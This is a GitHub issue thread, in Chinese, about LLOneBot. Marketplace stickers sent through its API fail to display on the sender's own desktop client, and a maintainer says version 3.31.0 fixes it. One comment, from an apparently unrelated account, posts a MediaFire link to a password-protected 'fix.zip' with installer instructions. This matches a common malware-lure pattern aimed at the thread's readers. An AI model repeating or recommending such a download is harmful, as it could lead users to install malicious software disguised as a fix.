### ISSUE TITLE
[BUG] 通过api发送的商城表情无法在本地显示

### ISSUE THREAD

**Issue by phillaria** [LLOneBot/LLOneBot#370]
### 系统版本

Windows 10企业版 1909

### QQNT 版本

9.9.10-26909（经测试在27206版本也有这个问题）

### LLOneBot 版本

3.30.5

### OneBot 客户端

1.2.1

### 发生了什么?

使用send_private_msg/send_group_msg api发送的商城表情，经测试在接收方可以正常显示，但发送方本地无法显示（且发送方在其他端同样可以显示）。例如我在电脑上运行A号机器人使用api发送给B号，在A号的手机、B号的手机、B号的电脑端正常显示，A号的电脑端不显示
![image](https://github.com/user-attachments/assets/4d6ea215-d6f8-4fbd-b94e-881d9c671343)
![image](https://github.com/user-attachments/assets/d5e57f47-6c97-4261-92c5-681e2393a513)

另外，手动发送的商城表情是正常的

### 如何复现

获取任意商城表情的消息段或CQ码，使用send_private_msg/send_group_msg将表情发送给好友或群

### 期望的结果?

本地正常显示发送的表情

### LLOneBot 运行日志

```shell
2024/8/26 18:13:02 undefined(3961840894): 收到 HTTP 请求 /send_private_msg {"user_id":"2705892349","message":"[CQ:mface,summary=&#91;拖走&#93;,url=https://gxh.vip.qq.com/club/item/parcel/item/31/31c70f1c87af33d5b1ff8a80100d0c76/raw300.gif,emoji_id=31c70f1c87af33d5b1ff8a80100d0c76,emoji_package_id=207431,key=85eb7acc979c32fa]"} 

2024/8/26 18:13:03 undefined(3961840894): 消息发送 252706655
```

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by idranme** [comment]
v3.31.0 已修复
